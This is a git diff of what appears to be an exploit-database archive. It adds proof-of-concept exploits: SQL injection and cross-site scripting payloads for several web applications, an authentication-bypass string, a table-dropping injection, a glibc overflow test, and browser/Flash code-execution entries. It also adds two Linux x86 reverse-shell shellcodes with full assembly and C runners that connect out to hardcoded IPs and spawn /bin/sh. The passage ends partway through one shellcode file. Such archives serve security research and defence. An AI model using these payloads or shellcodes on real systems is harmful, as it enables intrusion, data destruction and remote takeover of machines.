diff --git a/exploits/asp/webapps/44739.txt b/exploits/asp/webapps/44739.txt new file mode 100644 index 000000000..353e6bf3e --- /dev/null +++ b/exploits/asp/webapps/44739.txt @@ -0,0 +1,52 @@ +# Exploit Title: ASP.NET jVideo Kit - 'query' SQL Injection +# Dork: N/A +# Date: 23.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor: MediaSoft Pro +# Vendor Homepage: https://www.mediasoftpro.com/video-sharing-script/mvc/ +# Version: v1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : The vulnerability allows an attacker to inject sql commands +from the search section with 'query' parameter. You can use the GET or POST +methods. +==================================================== + +# PoC : SQLi : + +# GET : http://test.com/search?query=[SQL] +# POST : http://test.com/search +POST /search HTTP/1.1 +Host: test.com +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 +Firefox/45.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://test.com/login +Cookie: ASP.NET_SessionId=wxim4xkwgxvhtu5k3pvevc3o; +__RequestVerificationToken=iuu_Y6Xm3aOzaKj3EfCyE_-eT-Ff_lRdBMBZzyFRszSTGdNcaY2w5pH7ck0WZ2egIX3R18UlpXkr8pe_kxw6Ic2g1M-Cmz4woLsU6RRMV3M1 + +Connection: keep-alive +Content-Type: application/x-www-form-urlencoded +Content-Length: 10 +Query=test + + +# Vulnerable Payload : + +Parameter: query (GET) + Type: boolean-based blind + Title: AND boolean-based blind - WHERE or HAVING clause + Payload: query=test%' AND 3923=3923 AND '%'=' + + Type: error-based + Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING +clause (IN) + Payload: query=test%' AND 1603 IN (SELECT +(CHAR(113)+CHAR(107)+CHAR(113)+CHAR(122)+CHAR(113)+(SELECT (CASE WHEN +(1603=1603) THEN CHAR(49) ELSE CHAR(48) +END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)+CHAR(113))) AND '%'=' + + +==================================================== \ No newline at end of file diff --git a/exploits/java/webapps/44747.txt b/exploits/java/webapps/44747.txt new file mode 100644 index 000000000..82e96751d --- /dev/null +++ b/exploits/java/webapps/44747.txt @@ -0,0 +1,22 @@ +# Exploit Title: OpenDaylight SQL Injection +# Date: 2018-05-24 +# Exploit Author: JameelNabbo +# Website: jameelnabbo.com +# Vendor Homepage: https://www.opendaylight.org +# CVE: CVE-2018-1132 + + +intro: +OpenDaylight (ODL) is a modular open platform for customizing and automating networks of any size and scale. The OpenDaylight Project arose out of the SDN movement, with a clear focus on network programmability. It was designed from the outset as a foundation for commercial solutions that address a variety of use cases in existing network environments. + +attackers can SQL inject the component's database(SQLite) without authenticating to the controller or SDNInterfaceapp. + +The bug is in /impl/src/main/java/org/opendaylight/sdninterfaceapp/impl/database/SdniDataBase.java (line 373~391) + +The SDNI concats port information to build an insert SQL query, and it executes the query in SQLite. +However, in line 386, the portName is a string that can be customized by switches. Since SQLite supports multiple sql queries in one run, +attackers can customize the port name to inject another SQL if they compromise or forge a switch. + +POC: +For example, he can set portName as: +");drop table NAME;// \ No newline at end of file diff --git a/exploits/linux/local/44750.txt b/exploits/linux/local/44750.txt new file mode 100644 index 000000000..4e90ed59a --- /dev/null +++ b/exploits/linux/local/44750.txt @@ -0,0 +1,36 @@ +# Exploit Title: GNU glibc < 2.27 - Local Buffer Overflow +# Date: 2018-05-24 +# Exploit Author: JameelNabbo +# Website: jameelnabbo.com +# Vendor Homepage: http://www.gnu.org/ +# CVE: CVE-2018-11237 + + +# POC: + +$ cat mempcpy.c +#define _GNU_SOURCE 1 +#include +#include + +#define N 97699 +char a[N]; +char b[N+128]; + +int +main (void) +{ + memset (a, 'x', N); + char *c = mempcpy (b, a, N); + assert (*c == 0); +} +$ gcc -g mempcpy.c -o mempcpy -fno-builtin-mempcpy +$ ./mempcpy +mempcpy: mempcpy.c:14: main: Assertion `*c == 0' failed. + +The problem is these two lines in memmove-avx512-no-vzeroupper.S: + + vmovups %zmm4, (%rax) + vmovups %zmm5, 0x40(%rax) + +For mempcpy, %rax points to the end of the buffer. \ No newline at end of file diff --git a/exploits/linux/webapps/44749.txt b/exploits/linux/webapps/44749.txt new file mode 100644 index 000000000..6ee6406dd --- /dev/null +++ b/exploits/linux/webapps/44749.txt @@ -0,0 +1,57 @@ +# Exploit Title: Honeywell XL Web Controller - Cross-Site Scripting +# Date: 2018-05-24 +# Exploit Author: t4rkd3vilz +# Vendor Homepage: https://www.honeywell.com +# Version: WebVersion : XL1000C50 EXCEL WEB 52 I/O, XL1000C100 EXCEL WEB +# 104 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C1000 EXCEL WEB 600 I/O, +# XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL, +# XL1000C500U EXCEL WEB 300 I/O UUKL, and XL1000C1000U EXCEL WEB 600 I/O UUKL. +# Tested on: Linux +# CVE: CVE-2014-3110 + +# PoC + +POST /standard/mainframe.php HTTP/1.1 +Cache-Control: no-cache +Referer: http://79.2.122.25/standard/mainframe.php +Accept: text/xml,application/xml,application/xhtml+xml,text/ +html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, +like Gecko) Chrome/41.0.2272.16 Safari/537.36 +Accept-Language: en-us,en;q=0.5 +Cookie: Locale=1033 +Accept-Encoding: gzip, deflate +Content-Length: 222 +Content-Type: application/x-www-form-urlencoded + +SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5="/> +&LoginPasswordMD5=&LoginCommand=&LoginPassword=& +rememberMeCheck=&LoginDevice=192.168.1.12&LoginUserName=Guest + +HTTP/1.1 200 OK +Set-Cookie: rememberUser=deleted; expires=Wednesday, 24-May-17 08:54:02 +GMT; path=/ +Server: Apache/1.3.23 (Unix) PHP/4.4.9 +X-Powered-By: PHP/4.4.9 +Content-Type: text/html +Transfer-Encoding: chunked +Date: Thu, 24 May 2018 08:54:03 GMT + +
+Warning: xw_get_users() expects parameter 1 to be long, string +given in /mnt/mtd6/xlweb/web/standard/login/loginpage.php on line +97
+
+Warning: xml_load_texts_file() expects parameter 2 to be long, +string given in /mnt/mtd6/xlweb/web/standard/include/elements.php on +line 247
+ + + + + + <br /> +<b>Notice</b>: Undefined index: HeadTitle in <b>/mnt/mtd6/xlweb/web/ +standard/login/loginpage.php</b> on line <b>300</b><br /> + \ No newline at end of file diff --git a/exploits/linux/webapps/44751.txt b/exploits/linux/webapps/44751.txt new file mode 100644 index 000000000..063407253 --- /dev/null +++ b/exploits/linux/webapps/44751.txt @@ -0,0 +1,12 @@ +# Exploit Title: EU MRV Regulatory Complete Solution 1 - Authentication Bypass +# Date: 2018-05-24 +# Exploit Author: Veyselxan +# Vendor Homepage: https://codecanyon.net/item/eu-mrv-regulatory-complete-solution/21680923?s_rank=11 +# Version: v1 (REQUIRED) +# Tested on: Windows + +http://Target/projects/eumrv/app/#/access/signin + +username: '=''or' + +Password: '=''or' \ No newline at end of file diff --git a/exploits/php/webapps/44735.txt b/exploits/php/webapps/44735.txt deleted file mode 100644 index 3ebb2e152..000000000 --- a/exploits/php/webapps/44735.txt +++ /dev/null @@ -1,121 +0,0 @@ -# Title: NewsBee CMS 1.4 - Cross-Site Request Forgery -# Author: indoushka -# Tested on: windows 10 Français V.(Pro) -# Vendor: https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 -# Dork: N/A - -# PoC - - -
-
-
- - -
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
 Tab PermissionComment ModerateNewEditDelete
News
Videosx
Galleryx
Adsx
Home Sliderx
FAQx
Categoriesx
Pagesx
- - - - - - - -
- -
-
-
-
- \ No newline at end of file diff --git a/exploits/php/webapps/44746.txt b/exploits/php/webapps/44746.txt new file mode 100644 index 000000000..e0ad52753 --- /dev/null +++ b/exploits/php/webapps/44746.txt @@ -0,0 +1,44 @@ +# Exploit Title: PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting +# Dork: N/A +# Date: 23.05.2018 +# Exploit Author: Özkan Mustafa Akkuş (AkkuS) +# Vendor: MediaSoft Pro +# Vendor Homepage: https://codecanyon.net/item/paulnews-newspaper-and-magazine-script/19260686 +# Version: v1.0 +# Category: Webapps +# Tested on: Kali linux +# Description : The vulnerability allows an attacker to inject sql commands +from the search section with 'keyword' parameter. You can use the GET or +POST methods. +==================================================== + +# PoC : SQLi : + +http://test.com/news/search?keyword=[SQL] + +# Vulnerable Payload : + +Parameter: query (GET) + Type : boolean-based blind + Demo : http://test.com/news/search?keyword=test + Payload: keyword=-3431') OR 6871=6871# + + Type : error-based + Demo : http://test.com/news/search?keyword=test + Payload: keyword=test') OR (SELECT 8996 FROM(SELECT +COUNT(*),CONCAT(0x71626b6271,(SELECT +(ELT(8996=8996,1))),0x71766b7671,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- IsdG + + Type : AND/OR time-based blind + Demo : http://test.com/news/search?keyword=test + Payload: keyword=test') OR SLEEP(5)-- OEdN + + +==================================================== + +# PoC : XSS : + + Payload : +http://test.com/news/search?keyword=%27%20%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E%E2%80%98 +; \ No newline at end of file diff --git a/exploits/php/webapps/44748.html b/exploits/php/webapps/44748.html new file mode 100644 index 000000000..68226d2c9 --- /dev/null +++ b/exploits/php/webapps/44748.html @@ -0,0 +1,42 @@ +# Exploit Title: Timber - Ultimate Freelancer Platform 1.1 - Cross site request forgery +# Date: 2018-05-24 +# Exploit Author: L0RD or borna.nematzadeh123@gmail.com +# Vendor Homepage: +https://codecanyon.net/item/timber-ultimate-freelancer-platform/14747284?s_rank=1717 +# Version: 1.1 +# Tested on: Kali linux +========================================= + +# POC : + + + + CSRF POC + + +
+ + + + + + + + + + + + + + + + + +
+ + + + +========================================== \ No newline at end of file diff --git a/exploits/windows/local/44741.html b/exploits/windows/local/44741.html new file mode 100644 index 000000000..1beeb7ea9 --- /dev/null +++ b/exploits/windows/local/44741.html @@ -0,0 +1,353 @@ + + + + + + + + + + + + + + \ No newline at end of file diff --git a/exploits/windows/local/44742.txt b/exploits/windows/local/44742.txt new file mode 100644 index 000000000..99a5019da --- /dev/null +++ b/exploits/windows/local/44742.txt @@ -0,0 +1,5 @@ +## CVE-2015-5112 + +Pop up a calculator - Requires Flash ActiveX 18.0.0.194 + +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44742.swf \ No newline at end of file diff --git a/exploits/windows/local/44743.html b/exploits/windows/local/44743.html new file mode 100644 index 000000000..7dd9f9771 --- /dev/null +++ b/exploits/windows/local/44743.html @@ -0,0 +1,267 @@ + + + + + \ No newline at end of file diff --git a/exploits/windows/local/44744.txt b/exploits/windows/local/44744.txt new file mode 100644 index 000000000..7327d0376 --- /dev/null +++ b/exploits/windows/local/44744.txt @@ -0,0 +1,5 @@ +## CVE-2018-4878 (flash exploit) + +Pop up a calculator - tested with installation of flash activeX plugin 28.0.0.137 + +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44744.xlsx \ No newline at end of file diff --git a/exploits/windows/local/44745.txt b/exploits/windows/local/44745.txt new file mode 100644 index 000000000..3d5a4befa --- /dev/null +++ b/exploits/windows/local/44745.txt @@ -0,0 +1,5 @@ +## CVE-2018-4878 + +Pop up a calculator - Requires Flash ActiveX 28.0.0.137 + +Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44745.swf \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index a036a2a4d..18ee79f26 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9725,7 +9725,7 @@ id,file,description,date,author,type,platform,port 44633,exploits/linux/local/44633.rb,"Libuser - 'roothelper' Privilege Escalation (Metasploit)",2018-05-16,Metasploit,local,linux, 44644,exploits/hardware/local/44644.txt,"Microsoft Xbox One 10.0.14393.2152 - Code Execution (PoC)",2017-03-31,unknownv2,local,hardware, 44649,exploits/windows/local/44649.py,"Prime95 29.4b8 - Stack Buffer Overflow (SEH)",2018-05-18,crash_manucoot,local,windows, -44652,exploits/linux/local/44652.py,"DynoRoot DHCP - Client Command Injection",2018-05-18,"Kevin Kirsche",local,linux, +44652,exploits/linux/local/44652.py,"DynoRoot DHCP Client - Command Injection",2018-05-18,"Kevin Kirsche",local,linux, 44654,exploits/linux/local/44654.rb,"Linux 4.8.0 < 4.8.0-46 - AF_PACKET packet_set_ring Privilege Escalation (Metasploit)",2018-05-18,Metasploit,local,linux, 44658,exploits/windows/local/44658.py,"Easy MPEG to DVD Burner 1.7.11 - Local Buffer Overflow (SEH) (DEP Bypass)",2018-05-20,"Juan Prescotto",local,windows, 44677,exploits/linux/local/44677.rb,"Linux 2.6.30 < 2.6.36-rc8 - Reliable Datagram Sockets (RDS) Privilege Escalation (Metasploit)",2018-05-21,Metasploit,local,linux, @@ -9735,6 +9735,12 @@ id,file,description,date,author,type,platform,port 44696,exploits/linux/local/44696.rb,"Linux 4.4.0 < 4.4.0-53 - AF_PACKET chocobo_root Privilege Escalation (Metasploit)",2018-05-22,Metasploit,local,linux, 44697,exploits/windows/local/44697.txt,"Microsoft Windows - 'POP/MOV SS' Privilege Escalation",2018-05-22,"Can Bölük",local,windows, 44713,exploits/windows/local/44713.py,"FTPShell Server 6.80 - Buffer Overflow (SEH)",2018-05-23,"Hashim Jawad",local,windows, +44741,exploits/windows/local/44741.html,"Microsoft Internet Explorer 11 (Windows 7 x64/x86) - vbscript Code Execution",2018-05-21,smgorelik,local,windows, +44742,exploits/windows/local/44742.txt,"Flash ActiveX 18.0.0.194 - Code Execution",2018-02-13,smgorelik,local,windows, +44743,exploits/windows/local/44743.html,"Microsoft Internet Explorer 11 - javascript Code Execution",2016-02-01,checkpoint,local,windows, +44744,exploits/windows/local/44744.txt,"Flash ActiveX 28.0.0.137 - Code Execution (1)",2016-02-16,smgorelik,local,windows, +44745,exploits/windows/local/44745.txt,"Flash ActiveX 28.0.0.137 - Code Execution (2)",2016-02-13,smgorelik,local,windows, +44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -39410,6 +39416,11 @@ id,file,description,date,author,type,platform,port 44732,exploits/php/webapps/44732.txt,"eWallet Online Payment Gateway 2 - Cross-Site Request Forgery",2018-05-23,L0RD,webapps,php, 44733,exploits/php/webapps/44733.txt,"Mcard Mobile Card Selling Platform 1 - SQL Injection",2018-05-23,L0RD,webapps,php, 44734,exploits/linux/webapps/44734.txt,"Honeywell Scada System - Information Disclosure",2018-05-23,t4rkd3vilz,webapps,linux, -44735,exploits/php/webapps/44735.txt,"NewsBee CMS 1.4 - Cross-Site Request Forgery",2018-05-23,indoushka,webapps,php, 44736,exploits/hardware/webapps/44736.txt,"SKT LTE Wi-Fi SDT-CW3B1 - Unauthorized Admin Credential Change",2018-05-23,"Safak Aslan",webapps,hardware, 44737,exploits/php/webapps/44737.txt,"WordPress Plugin Peugeot Music - Arbitrary File Upload",2018-05-23,Mr.7z,webapps,php, +44739,exploits/asp/webapps/44739.txt,"ASP.NET jVideo Kit - 'query' SQL Injection",2018-05-24,AkkuS,webapps,asp, +44746,exploits/php/webapps/44746.txt,"PaulNews 1.0 - 'keyword' SQL Injection / Cross-Site Scripting",2018-05-24,AkkuS,webapps,php, +44747,exploits/java/webapps/44747.txt,"OpenDaylight - SQL Injection",2018-05-24,JameelNabbo,webapps,java, +44748,exploits/php/webapps/44748.html,"Timber 1.1 - Cross-Site Request Forgery",2018-05-24,L0RD,webapps,php, +44749,exploits/linux/webapps/44749.txt,"Honeywell XL Web Controller - Cross-Site Scripting",2018-05-24,t4rkd3vilz,webapps,linux, +44751,exploits/linux/webapps/44751.txt,"EU MRV Regulatory Complete Solution 1 - Authentication Bypass",2018-05-24,Veyselxan,webapps,linux, diff --git a/files_shellcodes.csv b/files_shellcodes.csv index 04c7bf3cf..d58ba033f 100644 --- a/files_shellcodes.csv +++ b/files_shellcodes.csv @@ -885,3 +885,5 @@ id,file,description,date,author,type,platform 44609,shellcodes/linux_x86/44609.c,"Linux/x86 - Read /etc/passwd Shellcode (62 bytes)",2018-05-10,"Nuno Freitas",shellcode,linux_x86 44620,shellcodes/linux_x86/44620.c,"Linux/x86 - Reverse (127.0.0.1:4444/TCP) Shell (/bin/sh) Shellcode (96 Bytes)",2018-05-14,"Paolo Perego",shellcode,linux_x86 44723,shellcodes/linux_x86/44723.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) + IPv6 Shellcode (113 bytes)",2018-05-23,"Matteo Malvica",shellcode,linux_x86 +44738,shellcodes/linux_x86/44738.c,"Linux/x86 - Reverse (10.10.2.4:4444/TCP) Shell Shellcode (68 bytes)",2018-05-24,"Nuno Freitas",shellcode,linux_x86 +44740,shellcodes/linux_x86/44740.c,"Linux/x86 - Reverse (10.0.7.17:4444/TCP) Shell (/bin/sh) Shellcode (101 Bytes)",2018-05-24,"Jonathan Crosby",shellcode,linux_x86 diff --git a/shellcodes/linux_x86/44738.c b/shellcodes/linux_x86/44738.c new file mode 100644 index 000000000..bdfd5bfd0 --- /dev/null +++ b/shellcodes/linux_x86/44738.c @@ -0,0 +1,70 @@ +/* +; Title : Linux/x86 - Reverse TCP Shell Shellcode (68 bytes) +; Date : May, 2018 +; Author : Nuno Freitas +; Blog Post : https://bufferoverflowed.wordpress.com +; Twitter : @nunof11 +; SLAE ID : SLAE-1112 +; Size : 68 bytes +; Tested on : i686 GNU/Linux + +section .text + +global _start + +_start: + xor ecx, ecx + mul ecx + + mov al, 0x66 + push ebx + inc ebx + push ebx + push 0x2 + mov ecx, esp + int 0x80 + + pop ecx + xchg eax, ebx +loop: + mov al, 0x3f + int 0x80 + dec ecx + jns loop + + mov al, 0x66 + dec ebx + push 0x04020a0a ; IP + push word 0x5c11 ; Port + push bx + mov ecx,esp + push 0x10 + push ecx + inc ebx + push ebx + mov ecx,esp + int 0x80 + + mov al, 0x0b + xor ecx, ecx + push ecx + push dword 0x68732f2f + push dword 0x6e69622f + mov ebx, esp + int 0x80 + +*/ + +#include +#include + +unsigned char shellcode[] = \ +"\x31\xc9\xf7\xe1\xb0\x66\x53\x43\x53\x6a\x02\x89\xe1\xcd\x80\x59\x93\xb0\x3f\xcd\x80\x49\x79\xf9\xb0\x66\x4b\x68\x0a\x0a\x02\x04\x66\x68\x11\x5c\x66\x53\x89\xe1\x6a\x10\x51\x43\x53\x89\xe1\xcd\x80\xb0\x0b\x31\xc9\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"; + +void main() +{ + printf("Shellcode Length: %d\n", strlen(shellcode)); + + int (*ret)() = (int(*)())shellcode; + ret(); +} \ No newline at end of file diff --git a/shellcodes/linux_x86/44740.c b/shellcodes/linux_x86/44740.c new file mode 100644 index 000000000..425363905 --- /dev/null +++ b/shellcodes/linux_x86/44740.c @@ -0,0 +1,324 @@ +/* Name : Jonathan "Chops" Crosby + * Email : me@securitychops.com + * Twitter : @securitychops + * Website : https://securitychops.com + * Blog Post : https://securitychops.com/2018/05/21/slae-assignment-2-reverse-shell-tcp-shellcode.html + * Student ID : SLAE-1250 + * Assignment 2 : Reverse Shell TCP (Linux/x86) + * Shellcode Length : 101 bytes + * Shellcode Purpose: Initiate a reverse shell back to the ip address / port number on shellcode execution + * + * Assembly code to generate shellcode in provided C program: + +; assemble/link assembly with: +; nasm -f elf32 -o shellcode.o shellcode.nasm +; ld -o shellcode shellcode.o + +global _start + +section .text +_start: + +; for all socket based calls we will need to use socketcall +; http://man7.org/linux/man-pages/man2/socketcall.2.html +; +; the relevant calls we will need to make will be: +; ----- +; SYS_SOCKET socket(2) 0x01 +; SYS_BIND bind(2) 0x02 +; SYS_CONNECT connect(2) 0x03 +; SYS_LISTEN listen(2) 0x04 +; SYS_ACCEPT accept(2) 0x05 +; ----- +; due to the way the registers need to be loaded up we will need to +; make the call to cocketcall by loading the following info into +; the following registers +; ----- +; eax : 0x66 (this is the value of socketcall) +; ebx : SYS_* value (0x01, etc) +; ecx : pointer to address on stack of parameters to subfunction + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; C version : int socket(domain, type , protocol) +; ASM version: socketcall(SYS_SOCKET, socket(AF_INET,SOCK_STREAM,IPPROTO_IP)) +; Returns : socketid into eax +; ----- +; Param Values: +; #define AF_INET 2 // Internet IP Protocol +; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html +; +; #define SOCK_STREAM 1 // stream (connection) socket +; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html +; +; #define IPPROTO_IP 0 +; If the protocol argument is zero, the default protocol for this address family and type shall be used. +; http://pubs.opengroup.org/onlinepubs/009695399/functions/socket.html +; ----- +; Registers before calling socketcall: +; +; /---eax---\ /---ebx---\ /--------ecx---------\ +; | 0x66 | | 0x01 | | byte, byte, byte | +; \---------/ \---------/ | 0x02 0x01 0x00 | +; \--------------------/ +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; + +; push params to the stack last first + +xor eax, eax ; zeroing out edx to set IPPROTO_IP to 0 +push eax ; pushing IPPROTO_IP onto stack +push byte 0x01 ; pushing SOCK_STREAM onto stack +push byte 0x02 ; pushing AF_INET onto stack + +mov ecx, esp ; moving address of parameter structure into ecx + +xor eax, eax ; zeroing out eax +mov al, 0x66 ; moving socketcall value into eax + +xor ebx, ebx ; zeroing out ebx +mov bl, 0x01 ; moving SYS_SOCKET into ebx + +int 0x80 ; calling interupt which triggers socketcall + +; registers after calling socktcall + +; /----eax----\ /---ebx---\ /--------ecx---------\ +; | socketid | | 0x01 | | *address to struct | +; \------------/ \---------/ \---------------------/ + +; eax now contains our socketid, since eax is volitale +; lets put it somewhere safe, like esi + +xchg eax, esi ; esi now contains our socketid + ; and eax contains whatever was in esi + +; /----eax----\ /---ebx---\ /--------ecx---------\ /---esi---\ +; | garbage | | 0x01 | | *address to struct | | socketid | +; \------------/ \---------/ \---------------------/ \---------/ + + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; C version : connect(socketid,(struct sockaddr *)&serverAddress, sizeof(serverAddress)); +; ASM version: socketcall(SYS_CONNECT, connect(socketid,(struct sockaddr *)&serverAddress, sizeof(serverAddress)); +; ----- +; Param Values: +; socketid // currently stored in esi +; +; &serverAddress // memory on the stack for sockaddr +; * http://pubs.opengroup.org/onlinepubs/7908799/xns/netinetin.h.html +; * Values of this type must be cast to struct sockaddr for use with the socket interfaces +; +; this parameter is a struct of sockaddr_in which has the following structure +; +; struct sockaddr_in { +; sa_family_t sin_family; // address family: AF_INET +; in_port_t sin_port; // port in network byte order +; struct in_addr sin_addr; // internet address +; // Internet address. +; struct in_addr { +; uint32_t s_addr; // address in network byte order +; }; +; +; sa_family_t +; #define AF_INET 2 // Internet IP Protocol +; http://students.mimuw.edu.pl/SO/Linux/Kod/include/linux/socket.h.html +; +; in_port_t // port in network byte order / big endian +; https://en.wikipedia.org/wiki/Endianness +; port 9876 would be: word 0x2694 +; +; sin_addr // uint32_t ia 4 bytes +; ip bound to will be XXX.XXX.XXX.XXX +; ip would be: dword 0xFFFF or whatever IP will end up being reversed +; +; sizeof(serverAddress) // this value represents bytes, so 4 bytes is 32bits +; the value here is 16 bytes or 0x10h which is ultimaly 32bits +; ----- +; +; Registers before calling socketcall: +; +; /---eax---\ /---ebx---\ /--------------------------ecx-----------------------------\ +; | 0x66 | | 0x03 | | socketid, mem of server address struct, size of struct | +; \---------/ \---------/ | esi ecx 0x10 | +; \-------------------------|--------------------------------/ + +; we need to create the first stack pointer for sockaddr_in + +xor edx, edx + +push edx + +mov byte [esp] , 0x0a ; 10 +mov byte [esp+2], 0x07 ; 07 +mov byte [esp+3], 0x11 ; 17 + + ; mov byte [esp+1], 0x00 left out on purpose since + ; this would put 0x00 in the final shellcode, which + ; is generally considered bad practice since null + ; tends to cause issues when executing + +push word 0x5C11 ; port number (0x115C is 4444 so we push little endian) + +push word 0x02 ; AF_INET - which is 0x02 + +mov ecx, esp ; move stack pointer to ecx + +push byte 0x10 ; 16 byts long (or 32bit) + +push ecx ; pushing sockaddr_in into esp + +push esi ; sockid already in esi, so pushing it + +mov ecx, esp ; moving stack pointer to ecx + +; from the previous call ebx is already 0x01 +; lets increment it by one +inc ebx ; increasing ebx from 1 to 2 +inc ebx ; and from 2 to 3 + +xor eax, eax ; zeroing out eax +mov al, 0x66 ; moving socketcall value into eax + +int 0x80 ; calling interupt which triggers socketcall + +; registers after calling socktcall + +; /----eax----\ /---ebx---\ /--------ecx---------\ /---esi---\ +; | uneeded | | 0x03 | | *address to struct | | socketid | +; \------------/ \---------/ \---------------------/ \---------/ + + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; C version : int dup2(clientid, localDiscripToDuplicate); +; ASM version: standard syscall using same format as above +; ----- +; Param Values: +; clientid // currently stored in eax +; +; localDiscripToDuplicate // 0, 1, 2 file descriptors to duplicate +; ----- +; Registers before calling dup2: +; +; /---eax---\ /---ebx----\ /-------------ecx---------------\ +; | 0x3f | | sockid | | file descriptor to dplicate | +; \---------/ \----------/ | 2, 1 adnd 0 | +; \-------------------------------/ +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; + + +mov ebx, esi ; moving socketid from eax to ebx + + ; now we need a loop to run through for + ; 0, 1 and 2 + +xor ecx, ecx ; zeroing out ecx +mov cl, 0x03 ; moving syscall for dup2 + +dupin: + xor eax, eax ; zeroing out eax + mov al, 0x3f ; setting syscall value for dup2 + dec cl ; decreasing loop counter since we + ; will need to deal with only 2, 1 and 0 + int 0x80 ; syscall triggering listen + jnz dupin ; if the zero flag is not set then do it again + +; registers after calling socktcall +; +; since we don't care about any return values +; we don't bother tracking register values + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; C version : int execve(const char *filename, char *const argv[], char *const envp[]); +; ASM version: standard syscall using same format as above +; ----- +; Param Values: +; filename // path of elf32 to execute +; +; argv // standard argv, first param is full path to elf32 null terminated +; +; envp // any environmental specific things, null in our case +; ----- +; Registers before calling execve: +; +; /---eax---\ /----------------ebx--------------------\ /-------------ecx---------------\ +; | 0x0B | | stack address if //bin/sh,0x00000000 | | stack address to 0x00000000 | +; \---------/ \---------------------------------------/ \-------------------------------/ +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; + +; call execve in order to complete the local bind shell +; execve("/bin/sh", argv[], envp[]); +; argv needs to be Address of /bin/sh, 0x00000000 +; this is because when you call something from bash, etc +; argv will contain the path of the executable within it + +; before starting we look like: +; execve(NOT-SET-YET, NOT-SET-YET, NOT-SET-YET) + +; First we need to get 0x00000000 into ebx somehow +; so lets zero out eax and push it to esp + +xor eax, eax ; zeroing out eax to make it 0x00000000 +push eax ; pushing 0x00000000 onto the stack (esp) + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; esp now looks like: 0x00000000; +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; + +; pushing "//bin/sh" (8 bytes and reverses due to little endian) +push 0x68732f6e ; hs/n : 2f68732f into esp +push 0x69622f2f ; ib// : 6e69622f into esp + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +;esp now looks like: "//bin/sh,0x00000000"; +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; + +; since we have been pushing to the stack, we have been pushing to esp +; now we need to get "//bin/sh,0x00000000" into ebx since it is the first parameter for execve +; since esp contains exactly what we need we move it to ebx + +mov ebx, esp ; moving the param to ebx + ; ebx now contains "//bin/sh,0x00000000" + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; now we look like: execve("//bin/sh,0x00000000", NOT-SET-YET, NOT-SET-YET); +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; + +; now we need to get 0x00000000 into edx +push eax ; eax is still 0x00000000 so push it to esp +mov edx, esp ; we need to move a 0x00000000 into + ; the third parameter in edx + +;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; +; now we look like: execve("//bin/sh,0x00000000", NOT-SET-YET, 0x00000000); 